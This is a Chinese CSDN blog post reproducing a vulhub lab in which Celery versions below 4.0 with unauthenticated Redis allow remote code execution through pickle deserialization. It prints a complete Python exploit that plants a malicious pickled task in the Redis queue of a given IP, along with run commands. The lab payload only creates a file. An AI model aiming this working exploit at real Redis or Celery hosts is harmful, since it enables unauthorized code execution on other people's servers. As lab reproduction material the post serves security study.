Celery <4.0 Redis未授权访问+Pickle反序列化利用

最新推荐文章于 2024-07-17 21:35:47 发布
最新推荐文章于 2024-07-17 21:35:47 发布
阅读量139 收藏
点赞数 2
分类专栏: vulhub复现学习合集 文章标签: redis 数据库 缓存
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shierbai/article/details/139189159
版权

Celery 是一个简单、灵活且可靠的分布式系统,用于处理大量消息,同时为操作提供维护此类系统所需的工具。它是一个专注于实时处理的任务队列,同时也支持任务调度。

在Celery < 4.0版本默认使用Pickle进行任务消息的序列化传递,当所用队列服务(比如Redis、RabbitMQ、RocketMQ等等等)存在未授权访问问题时,可利用Pickle反序列化漏洞执行任意代码。

漏洞利用脚本`exploit.py`仅支持在python3下使用

import pickle
import json
import base64
import redis
import sys
r = redis.Redis(host=sys.argv[1], port=6379, decode_responses=True,db=0) 

ori_str="{\"content-type\": \"application/x-python-serialize\", \"properties\": {\"delivery_tag\": \"16f3f59d-003c-4ef4-b1ea-6fa92dee529a\", \"reply_to\": \"9edb8565-0b59-3389-944e-a0139180a048\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"delivery_info\": {\"routing_key\": \"celery\", \"priority\": 0, \"exchange\": \"celery\"}, \"correlation_id\": \"6e046b48-bca4-49a0-bfa7-a92847216999\"}, \"headers\": {}, \"content-encoding\": \"binary\", \"body\": \"gAJ9cQAoWAMAAABldGFxAU5YBQAAAGNob3JkcQJOWAQAAABhcmdzcQNLZEvIhnEEWAMAAAB1dGNxBYhYBAAAAHRhc2txBlgJAAAAdGFza3MuYWRkcQdYAgAAAGlkcQhYJAAAADZlMDQ2YjQ4LWJjYTQtNDlhMC1iZmE3LWE5Mjg0NzIxNjk5OXEJWAgAAABlcnJiYWNrc3EKTlgJAAAAdGltZWxpbWl0cQtOToZxDFgGAAAAa3dhcmdzcQ19cQ5YBwAAAHRhc2tzZXRxD05YBwAAAHJldHJpZXNxEEsAWAkAAABjYWxsYmFja3NxEU5YBwAAAGV4cGlyZXNxEk51Lg==\"}"
task_dict = json.loads(ori_str)
command = 'touch /tmp/celery_success'
class Person(object):
    def __reduce__(self):
    	# 未导入os模块,通用
    	return (__import__('os').system, (command,))
pickleData = pickle.dumps(Person())
task_dict['body']=base64.b64encode(pickleData).decode()
print(task_dict)
r.lpush('celery',json.dumps(task_dict))

 

这里poc已经设置6379端口,使用时直接打靶机ip就行

pip install redis

python3 exploit.py 192.168.150.138

然后去查看命令执行情况

docker-compose exec celery ls -l /tmp

或者

shierbai
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[ vulhub漏洞复现篇 ] Celery <4.0 Redis授权访问+Pickle序列利用
qq_51577576的博客
10-04 1658
[ vulhub漏洞复现篇 ] Celery <4.0 Redis授权访问+Pickle序列利用 Celery < 4.0版本默认使用Pickle进行任务消息的序列传递,当所用队列服务(比如Redis、RabbitMQ、RocketMQ等等等)存在授权访问问题时,可利用Pickle序列漏洞执行任意代码。这里我们使用redis的队列服务
Celery 4.0 Redis授权访问+Pickle序列利用celery3_redis_unauth)POC
09-29
Celery 4.0 Redis授权访问+Pickle序列利用celery3_redis_unauth)exploit Celery < 4.0版本默认使用Pickle进行任务消息的序列传递,当所用队列服务(比如Redis、RabbitMQ、RocketMQ等等等)存在授权访问...
Redis授权访问利用复现
qq_34341458的博客
03-09 652
文章目录一、简介:二、漏洞影响版本三、漏洞危害四、漏洞环境搭建1. 靶机安装Redis2. kali安装Redis客户端(Redis-cli)五、漏洞复现利用方式11:写入webshell2. 写入一句话利用方式2:通过写入SSH公钥实现SSH登录利用方式3:在crontab里写定时任务,弹shell参考: 一、简介: Redis 是一个高效的数据库,默认会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公
【vulhub】Celery 漏洞 Redis授权访问命令执行利用
qq_45300786的博客
09-13 805
这个exp楼主目前还不会改,所以只能执行touch /tmp/celery_success 等哪天楼主把python的pickle序列研究会了,再来更新其他命令。 参考: https://blog.csdn.net/fnmsd/article/details/118575254
Celery Redis授权访问命令执行利用
fnmsd的博客
07-10 7213
Celery在队列中间件授权的情况下命令执行的利用
vulhub漏洞复现四_celery
weixin_44193247的博客
01-05 2339
vulhub漏洞复现练习篇
Python 之 Celery + Redis + Django 教程详细
YUAYU博客
07-07 6039
这里写目录标题第一章 Celery简介1、Celery是什么2、Celery使用场景3 、Celery工作流程4、Celery核心组件第二章 Celery安装相关软件1、Celery安装2、其他安装第三章 Celery代码实现1、Celery基本使用方法2、Celery的配置文件配置异步任务3、Celery的定时任务4、Django + Celery5、Celery的部署和监控 第一章 Celery简介 1、Celery是什么 1、Celery是python中使用比较多的并行分布式框架 2、Celery
celery+redis异步任务定时任务
weixin_44706011的博客
06-25 724
一、什么是Celery 1.1、celery是什么 Celery是一个简单、灵活且可靠的,处理大量消息的分布式系统,专注于实时处理的异步任务队列,同时也支持任务调度。 Celery的架构由三部分组成,消息中间件(message broker),任务执行单元(worker)和任务执行结果存储(task result store)组成。 消息中间件 Celery本身不提供消息服务,但是可以方便的和第三方提供的消息中间件集成。包括,RabbitMQ, Redis等等 任务执行单元 Worker是Celery提供
celery redis rabbitMQ各是什么及之间的区别?
道可道 非常道
03-11 7282
Celery: Celery是基于Python开发的分布式任务队列。它支持使用任务队列的方式在分布的机器/进程/线程上执行任务调度。 1、 celery工作流程: 消息中间件(message broker):Celery本身不提供消息服务,但是可以方便的和第三方提供的消息中间件集成。包括,RabbitMQ,Redis,MongoDB,SQLAlchemy等,其中rabbit...
celery cluser redis_celery redis rabbitMQ各是什么及之间的区别?
weixin_42513152的博客
01-12 166
Celery:Celery是基于Python开发的分布式任务队列。它支持使用任务队列的方式在分布的机器/进程/线程上执行任务调度。1、celery工作流程:image消息中间件(message broker):Celery本身不提供消息服务,但是可以方便的和第三方提供的消息中间件集成。包括,RabbitMQ, Redis, MongoDB ,SQLAlchemy等,其中rabbitm与redis比...
django-telegram-bot:我性感的Django + python-telegram-bot + Celery + Redis + Postgres + Dokku + GitHub Actions模板
04-02
性感的Django + python-telegram-bot + Celery + Redis + Postgres + Dokku + GitHub Actions模板。 生产量级的Telegram机器人,具有数据库,管理面板和许多有用的内置方法。 检查使用来自Main分支的代码的示例bot...
Django 3.0.1 + celery 4.4.2 + redis 部署
01-20
依次安装,发现celery-with-redis、django-celery支持的celery版本最高到4.0。也就是最新版本的Celery已经实现了 celery-with-redis、django-celery包的功能,不在需要安装这两个包。 ERROR: django-celery 3
docker-compose-django-postgresql-redis-example:Django + Postgres + Redis + Celery + Celery Beat + WebSocket服务器
02-05
使用Docker Compose开发Django 包括: Python + Node.js Django的 WebSocket服务器 芹菜工作者+芹菜节拍 PostgreSQL 雷迪斯 要求: Docker> = v1.10.3 Docker Compose> = v1.7.1 ... 创建数据库迁移docker-compose...
django+celery+redis+supervisor教程代码
03-07
【标题】"django+celery+redis+supervisor教程代码" 涉及到的知识点主要集中在构建分布式任务调度和管理的系统上。这个教程旨在教你如何使用Django作为Web框架,Celery作为异步任务队列,Redis作为消息中间件,以及...
Redis 深度历险:核心原理与应用实践 - 读书笔记
风中的默默
07-17 1088
不过你也不必过于担心,因为 Redis 对 HyperLogLog 的存储进行了优,在计数比较小时,它的存储空间采用稀疏矩阵存储,空间占用很小,仅仅在计数慢慢变大、稀疏矩阵占用空间渐渐超过了阎值时,才会一次性转变成稠密矩阵,才会占用 12KB的空间。数据段是由很多操作系统的页面组合而成,当父进程对其中一个页面的数据进行修改时,会将被共享的页面复制一份分离出来,然后对这个复制的页面进行修改,每个页面的大小只有 4KB。用户看到错误对话框后,会先阅读对话框的内容,再点击重试,这样就可以起到人工延时的效果。
redis setnx使用方法
servepeople的博客
07-17 345
SETNX是Redis中的一个命令,用于设置键的值,只有当键不存在时才进行设置。如果键已经存在,则不进行任何操作。
Redis初识
最新发布
qq_61422622的博客
07-17 889
为了明确分布式系统,我们先来了解单机架构,那么什么是单机架构呢?所谓的单机架构,即只有一台服务器,这个服务器负责所有的工作。如上图一个简单的电商网站的组成,有一个单机服务器完成所有功能,单机服务器主要用有两个服务一个是应用服务(服务端程序),一个是数据库服务(数据存储)。此时一台主机能满足业务需求,这就是单价架构。但是我们一台主机上的硬件资源是有限的,当同一时刻处理的请求多了,就可能会导致某个硬件资源不够用了,从而导致访问时间变长,甚至出错,一般遇到这种场景我们会进行优:开源节流,软件上的优
Redis中数据分片与分片策略
2301_76166241的博客
07-17 1139
数据分片是一种将数据分割并存储在多个节点上的技术,可以有效提高系统的扩展性和性能。在Redis中,数据分片主要用于解决单个实例存储容量和性能瓶颈的问题。通过将数据分散存储到多个Redis节点中,可以将负载均衡到不同的服务器上,提高系统的吞吐量和响应速度。
评价一下,在生产环境中,nginx+flask+SQLAlchemy+其他flask扩展+celery+redis+gunicorn+supervisor+ubuntu22.04怎么样?
05-27
这样的架构在生产环境中是非常常见且可靠的。Nginx作为向代理服务器,可以提供高性能的负载均衡和静态资源缓存,同时也可以提供一些基本的安全性能。Flask是一个轻量级的Web框架,易于使用且具有强大的可扩展性。SQLAlchemy是一个强大的ORM工具,可以方便地与各种数据库进行交互。CeleryRedis可以用来处理异步任务和队列。Gunicorn是一个可靠的WSGI服务器,可以提供高性能的Web服务。Supervisor可以用来管理进程和服务,确保它们一直在运行。Ubuntu 22.04是一个稳定和经过验证的操作系统,可以提供强大的安全性和可靠性。总的来说,这个架构是非常可靠和高效的,可以用于任何大型生产环境中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值